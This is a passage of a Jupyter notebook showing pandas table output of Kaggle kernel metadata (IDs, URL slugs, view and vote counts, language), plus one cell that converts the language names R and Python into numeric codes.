" <td>263.0</td>\n",
" <td>False</td>\n",
" <td>digit-recognizer</td>\n",
" <td>NaN</td>\n",
" <td>142</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>29</th>\n",
" <td>39</td>\n",
" <td>319893</td>\n",
" <td>552.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>321.0</td>\n",
" <td>False</td>\n",
" <td>digit-recognizer-using-knn</td>\n",
" <td>NaN</td>\n",
" <td>717</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>...</th>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" <td>...</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201951</th>\n",
" <td>1875333</td>\n",
" <td>442623</td>\n",
" <td>6498125.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6495275.0</td>\n",
" <td>False</td>\n",
" <td>project-euler-21</td>\n",
" <td>NaN</td>\n",
" <td>18</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201952</th>\n",
" <td>1875398</td>\n",
" <td>1497793</td>\n",
" <td>6497141.0</td>\n",
" <td>2395222.0</td>\n",
" <td>NaN</td>\n",
" <td>6497049.0</td>\n",
" <td>False</td>\n",
" <td>ny-stock-price-prediction-rnn-lstm-gru-eb2000</td>\n",
" <td>NaN</td>\n",
" <td>37</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201953</th>\n",
" <td>1875414</td>\n",
" <td>2080166</td>\n",
" <td>6494175.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6494175.0</td>\n",
" <td>False</td>\n",
" <td>starter-banknote-f2165545-1</td>\n",
" <td>NaN</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201954</th>\n",
" <td>1875417</td>\n",
" <td>1776773</td>\n",
" <td>6499806.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6498408.0</td>\n",
" <td>False</td>\n",
" <td>lightgbm-automated-feature-engineering-easy</td>\n",
" <td>NaN</td>\n",
" <td>57</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201955</th>\n",
" <td>1915910</td>\n",
" <td>498422</td>\n",
" <td>6657552.0</td>\n",
" <td>6528403.0</td>\n",
" <td>NaN</td>\n",
" <td>6655666.0</td>\n",
" <td>False</td>\n",
" <td>a3-demo-decision-trees</td>\n",
" <td>NaN</td>\n",
" <td>29</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201956</th>\n",
" <td>1915916</td>\n",
" <td>2080166</td>\n",
" <td>6655493.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6655493.0</td>\n",
" <td>False</td>\n",
" <td>starter-twitter-worlds2018-0cb7d034-3</td>\n",
" <td>NaN</td>\n",
" <td>3</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201957</th>\n",
" <td>1915988</td>\n",
" <td>1660833</td>\n",
" <td>6656526.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6655878.0</td>\n",
" <td>False</td>\n",
" <td>starter-twitter-worlds2018</td>\n",
" <td>NaN</td>\n",
" <td>39</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201958</th>\n",
" <td>1916035</td>\n",
" <td>1179427</td>\n",
" <td>6661990.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6661990.0</td>\n",
" <td>False</td>\n",
" <td>tutorial-linear-regression</td>\n",
" <td>NaN</td>\n",
" <td>22</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201959</th>\n",
" <td>1916052</td>\n",
" <td>1828058</td>\n",
" <td>6730922.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656151.0</td>\n",
" <td>False</td>\n",
" <td>mks-proteins</td>\n",
" <td>NaN</td>\n",
" <td>208</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201960</th>\n",
" <td>1916057</td>\n",
" <td>1601569</td>\n",
" <td>6730437.0</td>\n",
" <td>6633328.0</td>\n",
" <td>NaN</td>\n",
" <td>6668207.0</td>\n",
" <td>False</td>\n",
" <td>exploration-of-f1-dataset-1102f3-aaf5b9</td>\n",
" <td>NaN</td>\n",
" <td>41</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201961</th>\n",
" <td>1916068</td>\n",
" <td>1267737</td>\n",
" <td>6656222.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656222.0</td>\n",
" <td>False</td>\n",
" <td>fraud-detection</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201962</th>\n",
" <td>1916091</td>\n",
" <td>756325</td>\n",
" <td>6656455.0</td>\n",
" <td>NaN</td>\n",
" <td>69117.0</td>\n",
" <td>6656455.0</td>\n",
" <td>False</td>\n",
" <td>google-customer-revenue-prediction</td>\n",
" <td>NaN</td>\n",
" <td>239</td>\n",
" <td>3</td>\n",
" <td>3</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201963</th>\n",
" <td>1916101</td>\n",
" <td>1090244</td>\n",
" <td>6690675.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6656399.0</td>\n",
" <td>False</td>\n",
" <td>diabeticretinopathyvgg16-finetuning</td>\n",
" <td>NaN</td>\n",
" <td>144</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201964</th>\n",
" <td>1916124</td>\n",
" <td>1170777</td>\n",
" <td>6805081.0</td>\n",
" <td>6632919.0</td>\n",
" <td>NaN</td>\n",
" <td>6805081.0</td>\n",
" <td>False</td>\n",
" <td>protein-atlas-exploration-and-baseline</td>\n",
" <td>NaN</td>\n",
" <td>17</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201965</th>\n",
" <td>1916181</td>\n",
" <td>2386017</td>\n",
" <td>6660035.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6659703.0</td>\n",
" <td>False</td>\n",
" <td>01-iris-species</td>\n",
" <td>NaN</td>\n",
" <td>36</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201966</th>\n",
" <td>1916199</td>\n",
" <td>2108937</td>\n",
" <td>6938214.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657733.0</td>\n",
" <td>False</td>\n",
" <td>chicago-crime-investigation</td>\n",
" <td>NaN</td>\n",
" <td>71</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201967</th>\n",
" <td>1916215</td>\n",
" <td>637434</td>\n",
" <td>6904698.0</td>\n",
" <td>6600035.0</td>\n",
" <td>69362.0</td>\n",
" <td>6657640.0</td>\n",
" <td>False</td>\n",
" <td>cnn-128x128x4-keras-from-scratch-lb-0-328</td>\n",
" <td>2.0</td>\n",
" <td>1808</td>\n",
" <td>15</td>\n",
" <td>36</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201968</th>\n",
" <td>1916243</td>\n",
" <td>885589</td>\n",
" <td>6895750.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6656920.0</td>\n",
" <td>False</td>\n",
" <td>transforma-o-de-vari-veis</td>\n",
" <td>NaN</td>\n",
" <td>117</td>\n",
" <td>0</td>\n",
" <td>13</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201969</th>\n",
" <td>1916268</td>\n",
" <td>1113072</td>\n",
" <td>6941531.0</td>\n",
" <td>NaN</td>\n",
" <td>69337.0</td>\n",
" <td>6658725.0</td>\n",
" <td>False</td>\n",
" <td>apply-t-sne-on-news</td>\n",
" <td>3.0</td>\n",
" <td>907</td>\n",
" <td>7</td>\n",
" <td>15</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201970</th>\n",
" <td>1916283</td>\n",
" <td>885589</td>\n",
" <td>6684908.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6657006.0</td>\n",
" <td>False</td>\n",
" <td>redu-o-de-dimensionalidade</td>\n",
" <td>NaN</td>\n",
" <td>43</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201971</th>\n",
" <td>1916285</td>\n",
" <td>885589</td>\n",
" <td>6681010.0</td>\n",
" <td>6601958.0</td>\n",
" <td>NaN</td>\n",
" <td>6657012.0</td>\n",
" <td>False</td>\n",
" <td>clusteriza-o</td>\n",
" <td>NaN</td>\n",
" <td>33</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201972</th>\n",
" <td>1916310</td>\n",
" <td>2080166</td>\n",
" <td>6657002.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657002.0</td>\n",
" <td>False</td>\n",
" <td>starter-twitter-data-4e7ab639-b</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201973</th>\n",
" <td>1916350</td>\n",
" <td>2092403</td>\n",
" <td>6671885.0</td>\n",
" <td>NaN</td>\n",
" <td>69316.0</td>\n",
" <td>6659016.0</td>\n",
" <td>False</td>\n",
" <td>how-to-score-0-0255-0-0245-top-10-score</td>\n",
" <td>NaN</td>\n",
" <td>552</td>\n",
" <td>2</td>\n",
" <td>10</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201974</th>\n",
" <td>1916366</td>\n",
" <td>2225268</td>\n",
" <td>6670628.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657409.0</td>\n",
" <td>False</td>\n",
" <td>house-price-xgboost</td>\n",
" <td>NaN</td>\n",
" <td>11</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201975</th>\n",
" <td>1916461</td>\n",
" <td>2080166</td>\n",
" <td>6657685.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6657685.0</td>\n",
" <td>False</td>\n",
" <td>starter-twitter-sentiment-analysis-f08e9d52-d</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201976</th>\n",
" <td>1916539</td>\n",
" <td>1162757</td>\n",
" <td>6659497.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6659320.0</td>\n",
" <td>False</td>\n",
" <td>mnist-with-fastai-style</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201977</th>\n",
" <td>1916566</td>\n",
" <td>1270421</td>\n",
" <td>6658657.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6658657.0</td>\n",
" <td>False</td>\n",
" <td>a-begining-try</td>\n",
" <td>NaN</td>\n",
" <td>31</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201978</th>\n",
" <td>1916572</td>\n",
" <td>2373215</td>\n",
" <td>6658820.0</td>\n",
" <td>1847749.0</td>\n",
" <td>NaN</td>\n",
" <td>6658820.0</td>\n",
" <td>False</td>\n",
" <td>getting-started-in-r-first-steps-337898</td>\n",
" <td>NaN</td>\n",
" <td>4</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201979</th>\n",
" <td>1916595</td>\n",
" <td>2355967</td>\n",
" <td>6658417.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>6658388.0</td>\n",
" <td>False</td>\n",
" <td>my-first-data-science-homework</td>\n",
" <td>NaN</td>\n",
" <td>70</td>\n",
" <td>0</td>\n",
" <td>2</td>\n",
" <td>2</td>\n",
" </tr>\n",
" <tr>\n",
" <th>201980</th>\n",
" <td>1916605</td>\n",
" <td>1977282</td>\n",
" <td>6818544.0</td>\n",
" <td>NaN</td>\n",
" <td>69150.0</td>\n",
" <td>6660859.0</td>\n",
" <td>False</td>\n",
" <td>u-s-democrat-and-republican-tweet-exploration</td>\n",
" <td>NaN</td>\n",
" <td>82</td>\n",
" <td>2</td>\n",
" <td>4</td>\n",
" <td>1</td>\n",
" </tr>\n",
" </tbody>\n",
"</table>\n",
"<p>201981 rows × 13 columns</p>\n",
"</div>"
],
"text/plain": [
" Id AuthorUserId CurrentKernelVersionId \\\n",
"0 1 2505 205.0 \n",
"1 2 3716 1748.0 \n",
"2 4 3716 41.0 \n",
"3 5 28963 19.0 \n",
"4 6 3716 21.0 \n",
"5 7 3716 48.0 \n",
"6 9 3716 50.0 \n",
"7 11 3716 373.0 \n",
"8 12 993 6467.0 \n",
"9 13 993 6468.0 \n",
"10 14 993 269065.0 \n",
"11 15 993 520.0 \n",
"12 16 993 154.0 \n",
"13 17 993 649.0 \n",
"14 20 993 803.0 \n",
"15 21 993 1227.0 \n",
"16 22 206545 190.0 \n",
"17 23 114978 193.0 \n",
"18 24 114978 308.0 \n",
"19 25 993 213.0 \n",
"20 26 993 212.0 \n",
"21 27 993 294.0 \n",
"22 29 114978 238.0 \n",
"23 30 9679 236.0 \n",
"24 31 185835 261.0 \n",
"25 32 19605 244.0 \n",
"26 33 319768 253.0 \n",
"27 34 28963 19064.0 \n",
"28 35 320040 264.0 \n",
"29 39 319893 552.0 \n",
"... ... ... ... \n",
"201951 1875333 442623 6498125.0 \n",
"201952 1875398 1497793 6497141.0 \n",
"201953 1875414 2080166 6494175.0 \n",
"201954 1875417 1776773 6499806.0 \n",
"201955 1915910 498422 6657552.0 \n",
"201956 1915916 2080166 6655493.0 \n",
"201957 1915988 1660833 6656526.0 \n",
"201958 1916035 1179427 6661990.0 \n",
"201959 1916052 1828058 6730922.0 \n",
"201960 1916057 1601569 6730437.0 \n",
"201961 1916068 1267737 6656222.0 \n",
"201962 1916091 756325 6656455.0 \n",
"201963 1916101 1090244 6690675.0 \n",
"201964 1916124 1170777 6805081.0 \n",
"201965 1916181 2386017 6660035.0 \n",
"201966 1916199 2108937 6938214.0 \n",
"201967 1916215 637434 6904698.0 \n",
"201968 1916243 885589 6895750.0 \n",
"201969 1916268 1113072 6941531.0 \n",
"201970 1916283 885589 6684908.0 \n",
"201971 1916285 885589 6681010.0 \n",
"201972 1916310 2080166 6657002.0 \n",
"201973 1916350 2092403 6671885.0 \n",
"201974 1916366 2225268 6670628.0 \n",
"201975 1916461 2080166 6657685.0 \n",
"201976 1916539 1162757 6659497.0 \n",
"201977 1916566 1270421 6658657.0 \n",
"201978 1916572 2373215 6658820.0 \n",
"201979 1916595 2355967 6658417.0 \n",
"201980 1916605 1977282 6818544.0 \n",
"\n",
" ForkParentKernelVersionId ForumTopicId FirstKernelVersionId \\\n",
"0 NaN NaN 1.0 \n",
"1 NaN 26670.0 2.0 \n",
"2 NaN NaN 9.0 \n",
"3 NaN NaN 13.0 \n",
"4 NaN NaN 15.0 \n",
"5 NaN NaN 27.0 \n",
"6 NaN NaN 49.0 \n",
"7 NaN NaN 54.0 \n",
"8 NaN NaN 55.0 \n",
"9 NaN NaN 73.0 \n",
"10 NaN 14925.0 77.0 \n",
"11 NaN 20068.0 140.0 \n",
"12 NaN NaN 141.0 \n",
"13 NaN 18337.0 155.0 \n",
"14 NaN NaN 171.0 \n",
"15 NaN 17462.0 185.0 \n",
"16 NaN NaN 188.0 \n",
"17 NaN NaN 191.0 \n",
"18 NaN NaN 194.0 \n",
"19 NaN NaN 209.0 \n",
"20 NaN NaN 212.0 \n",
"21 NaN 35477.0 214.0 \n",
"22 NaN NaN 216.0 \n",
"23 NaN NaN 236.0 \n",
"24 NaN NaN 239.0 \n",
"25 NaN NaN 244.0 \n",
"26 NaN NaN 253.0 \n",
"27 NaN NaN 262.0 \n",
"28 NaN NaN 263.0 \n",
"29 NaN NaN 321.0 \n",
"... ... ... ... \n",
"201951 NaN NaN 6495275.0 \n",
"201952 2395222.0 NaN 6497049.0 \n",
"201953 NaN NaN 6494175.0 \n",
"201954 NaN NaN 6498408.0 \n",
"201955 6528403.0 NaN 6655666.0 \n",
"201956 NaN NaN 6655493.0 \n",
"201957 NaN NaN 6655878.0 \n",
"201958 NaN NaN 6661990.0 \n",
"201959 NaN NaN 6656151.0 \n",
"201960 6633328.0 NaN 6668207.0 \n",
"201961 NaN NaN 6656222.0 \n",
"201962 NaN 69117.0 6656455.0 \n",
"201963 NaN NaN 6656399.0 \n",
"201964 6632919.0 NaN 6805081.0 \n",
"201965 NaN NaN 6659703.0 \n",
"201966 NaN NaN 6657733.0 \n",
"201967 6600035.0 69362.0 6657640.0 \n",
"201968 6601958.0 NaN 6656920.0 \n",
"201969 NaN 69337.0 6658725.0 \n",
"201970 6601958.0 NaN 6657006.0 \n",
"201971 6601958.0 NaN 6657012.0 \n",
"201972 NaN NaN 6657002.0 \n",
"201973 NaN 69316.0 6659016.0 \n",
"201974 NaN NaN 6657409.0 \n",
"201975 NaN NaN 6657685.0 \n",
"201976 NaN NaN 6659320.0 \n",
"201977 NaN NaN 6658657.0 \n",
"201978 1847749.0 NaN 6658820.0 \n",
"201979 NaN NaN 6658388.0 \n",
"201980 NaN 69150.0 6660859.0 \n",
"\n",
" IsProjectLanguageTemplate \\\n",
"0 False \n",
"1 False \n",
"2 False \n",
"3 False \n",
"4 False \n",
"5 False \n",
"6 False \n",
"7 False \n",
"8 False \n",
"9 False \n",
"10 False \n",
"11 False \n",
"12 False \n",
"13 False \n",
"14 False \n",
"15 False \n",
"16 False \n",
"17 False \n",
"18 False \n",
"19 False \n",
"20 False \n",
"21 False \n",
"22 False \n",
"23 False \n",
"24 False \n",
"25 False \n",
"26 False \n",
"27 False \n",
"28 False \n",
"29 False \n",
"... ... \n",
"201951 False \n",
"201952 False \n",
"201953 False \n",
"201954 False \n",
"201955 False \n",
"201956 False \n",
"201957 False \n",
"201958 False \n",
"201959 False \n",
"201960 False \n",
"201961 False \n",
"201962 False \n",
"201963 False \n",
"201964 False \n",
"201965 False \n",
"201966 False \n",
"201967 False \n",
"201968 False \n",
"201969 False \n",
"201970 False \n",
"201971 False \n",
"201972 False \n",
"201973 False \n",
"201974 False \n",
"201975 False \n",
"201976 False \n",
"201977 False \n",
"201978 False \n",
"201979 False \n",
"201980 False \n",
"\n",
" CurrentUrlSlug Medal TotalViews \\\n",
"0 hello NaN 24 \n",
"1 rf-proximity 3.0 7547 \n",
"2 r-version NaN 9 \n",
"3 test1 NaN 9 \n",
"4 are-icons-missing NaN 7 \n",
"5 testing-version-bolding NaN 13 \n",
"6 testing-version-bolding-with-new-script NaN 2 \n",
"7 as-raster NaN 2 \n",
"8 whoops-doing-this-logged-in-under-my-own-name NaN 6 \n",
"9 installed-packages NaN 6 \n",
"10 installed-r-packages NaN 7921 \n",
"11 example-handwritten-digits 3.0 29080 \n",
"12 mean-digits NaN 9 \n",
"13 pixel-mean-and-variances-by-digit NaN 9989 \n",
"14 random-forest-benchmark-tree-4 NaN 7 \n",
"15 random-forest-benchmark-1 2.0 52294 \n",
"16 dougg-test NaN 164 \n",
"17 some-basic-stats NaN 230 \n",
"18 rotate-all-the-features NaN 2491 \n",
"19 running-system-commands NaN 0 \n",
"20 running-system-commands-1 NaN 84 \n",
"21 we-have-imagemagick-installed NaN 685 \n",
"22 randombananaclassifier NaN 766 \n",
"23 mytest NaN 124 \n",
"24 peek-data NaN 1064 \n",
"25 example-r NaN 337 \n",
"26 testo NaN 58 \n",
"27 python NaN 7 \n",
"28 digit-recognizer NaN 142 \n",
"29 digit-recognizer-using-knn NaN 717 \n",
"... ... ... ... \n",
"201951 project-euler-21 NaN 18 \n",
"201952 ny-stock-price-prediction-rnn-lstm-gru-eb2000 NaN 37 \n",
"201953 starter-banknote-f2165545-1 NaN 0 \n",
"201954 lightgbm-automated-feature-engineering-easy NaN 57 \n",
"201955 a3-demo-decision-trees NaN 29 \n",
"201956 starter-twitter-worlds2018-0cb7d034-3 NaN 3 \n",
"201957 starter-twitter-worlds2018 NaN 39 \n",
"201958 tutorial-linear-regression NaN 22 \n",
"201959 mks-proteins NaN 208 \n",
"201960 exploration-of-f1-dataset-1102f3-aaf5b9 NaN 41 \n",
"201961 fraud-detection NaN 17 \n",
"201962 google-customer-revenue-prediction NaN 239 \n",
"201963 diabeticretinopathyvgg16-finetuning NaN 144 \n",
"201964 protein-atlas-exploration-and-baseline NaN 17 \n",
"201965 01-iris-species NaN 36 \n",
"201966 chicago-crime-investigation NaN 71 \n",
"201967 cnn-128x128x4-keras-from-scratch-lb-0-328 2.0 1808 \n",
"201968 transforma-o-de-vari-veis NaN 117 \n",
"201969 apply-t-sne-on-news 3.0 907 \n",
"201970 redu-o-de-dimensionalidade NaN 43 \n",
"201971 clusteriza-o NaN 33 \n",
"201972 starter-twitter-data-4e7ab639-b NaN 2 \n",
"201973 how-to-score-0-0255-0-0245-top-10-score NaN 552 \n",
"201974 house-price-xgboost NaN 11 \n",
"201975 starter-twitter-sentiment-analysis-f08e9d52-d NaN 4 \n",
"201976 mnist-with-fastai-style NaN 6 \n",
"201977 a-begining-try NaN 31 \n",
"201978 getting-started-in-r-first-steps-337898 NaN 4 \n",
"201979 my-first-data-science-homework NaN 70 \n",
"201980 u-s-democrat-and-republican-tweet-exploration NaN 82 \n",
"\n",
" TotalComments TotalVotes LanguageName \n",
"0 0 0 1 \n",
"1 1 12 1 \n",
"2 0 0 1 \n",
"3 0 0 1 \n",
"4 0 0 1 \n",
"5 0 0 1 \n",
"6 0 0 1 \n",
"7 0 0 1 \n",
"8 0 0 1 \n",
"9 0 0 1 \n",
"10 2 6 1 \n",
"11 8 36 1 \n",
"12 0 0 1 \n",
"13 5 8 1 \n",
"14 0 0 1 \n",
"15 23 91 1 \n",
"16 0 0 1 \n",
"17 0 0 1 \n",
"18 0 4 1 \n",
"19 0 0 1 \n",
"20 0 0 1 \n",
"21 1 0 1 \n",
"22 0 1 1 \n",
"23 0 0 1 \n",
"24 0 0 1 \n",
"25 0 0 1 \n",
"26 0 0 1 \n",
"27 0 0 1 \n",
"28 0 0 1 \n",
"29 0 0 1 \n",
"... ... ... ... \n",
"201951 0 1 2 \n",
"201952 0 0 2 \n",
"201953 0 0 2 \n",
"201954 0 1 2 \n",
"201955 0 0 2 \n",
"201956 0 0 2 \n",
"201957 0 1 2 \n",
"201958 0 0 2 \n",
"201959 0 0 1 \n",
"201960 0 0 2 \n",
"201961 0 0 2 \n",
"201962 3 3 2 \n",
"201963 0 1 2 \n",
"201964 0 0 2 \n",
"201965 0 1 2 \n",
"201966 0 0 2 \n",
"201967 15 36 2 \n",
"201968 0 13 2 \n",
"201969 7 15 2 \n",
"201970 0 1 2 \n",
"201971 0 1 2 \n",
"201972 0 0 2 \n",
"201973 2 10 2 \n",
"201974 0 0 2 \n",
"201975 0 0 2 \n",
"201976 0 0 2 \n",
"201977 0 0 2 \n",
"201978 0 0 1 \n",
"201979 0 2 2 \n",
"201980 2 4 1 \n",
"\n",
"[201981 rows x 13 columns]"
]
},
"execution_count": 6,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"#Change Language type to numeric classes\n",
"df.LanguageName[df.LanguageName==\"R\"]=1\n",
"df.LanguageName[df.LanguageName==\"Python\"]=2\n",
"df"
]
},
{
"cell_type": "code",
"execution_count": 19,
"metadata": {},
"outputs": [
{
"data": {
"text/html": [
"<div>\n",
"<style scoped>\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"</style>\n",
"<table border=\"1\" class=\"dataframe\">\n",
" <thead>\n",
" <tr style=\"text-align: right;\">\n",
" <th></th>\n",
" <th>Id</th>\n",
" <th>AuthorUserId</th>\n",
" <th>CurrentKernelVersionId</th>\n",
" <th>ForkParentKernelVersionId</th>\n",
" <th>ForumTopicId</th>\n",
" <th>FirstKernelVersionId</th>\n",
" <th>IsProjectLanguageTemplate</th>\n",
" <th>CurrentUrlSlug</th>\n",
" <th>Medal</th>\n",
" <th>TotalViews</th>\n",
" <th>TotalComments</th>\n",
" <th>TotalVotes</th>\n",
" <th>LanguageName</th>\n",
" </tr>\n",
" </thead>\n",
" <tbody>\n",
" <tr>\n",
" <th>0</th>\n",
" <td>1</td>\n",
" <td>2505</td>\n",
" <td>205.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>1.0</td>\n",
" <td>0.0</td>\n",
" <td>hello</td>\n",
" <td>NaN</td>\n",
" <td>24</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>1</th>\n",
" <td>2</td>\n",
" <td>3716</td>\n",
" <td>1748.0</td>\n",
" <td>NaN</td>\n",
" <td>26670.0</td>\n",
" <td>2.0</td>\n",
" <td>0.0</td>\n",
" <td>rf-proximity</td>\n",
" <td>3.0</td>\n",
" <td>7547</td>\n",
" <td>1</td>\n",
" <td>12</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>2</th>\n",
" <td>4</td>\n",
" <td>3716</td>\n",
" <td>41.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>9.0</td>\n",
" <td>0.0</td>\n",
" <td>r-version</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>3</th>\n",
" <td>5</td>\n",
" <td>28963</td>\n",
" <td>19.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>13.0</td>\n",
" <td>0.0</td>\n",
" <td>test1</td>\n",
" <td>NaN</td>\n",
" <td>9</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>4</th>\n",
" <td>6</td>\n",
" <td>3716</td>\n",
" <td>21.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>15.0</td>\n",
" <td>0.0</td>\n",
" <td>are-icons-missing</td>\n",
" <td>NaN</td>\n",
" <td>7</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>5</th>\n",
" <td>7</td>\n",
" <td>3716</td>\n",
" <td>48.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>27.0</td>\n",
" <td>0.0</td>\n",
" <td>testing-version-bolding</td>\n",
" <td>NaN</td>\n",
" <td>13</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>6</th>\n",
" <td>9</td>\n",
" <td>3716</td>\n",
" <td>50.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>49.0</td>\n",
" <td>0.0</td>\n",
" <td>testing-version-bolding-with-new-script</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>7</th>\n",
" <td>11</td>\n",
" <td>3716</td>\n",
" <td>373.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>54.0</td>\n",
" <td>0.0</td>\n",
" <td>as-raster</td>\n",
" <td>NaN</td>\n",
" <td>2</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
" <tr>\n",
" <th>8</th>\n",
" <td>12</td>\n",
" <td>993</td>\n",
" <td>6467.0</td>\n",
" <td>NaN</td>\n",
" <td>NaN</td>\n",
" <td>55.0</td>\n",
" <td>0.0</td>\n",
" <td>whoops-doing-this-logged-in-under-my-own-name</td>\n",
" <td>NaN</td>\n",
" <td>6</td>\n",
" <td>0</td>\n",
" <td>0</td>\n",
" <td>1</td>\n",
" </tr>\n",
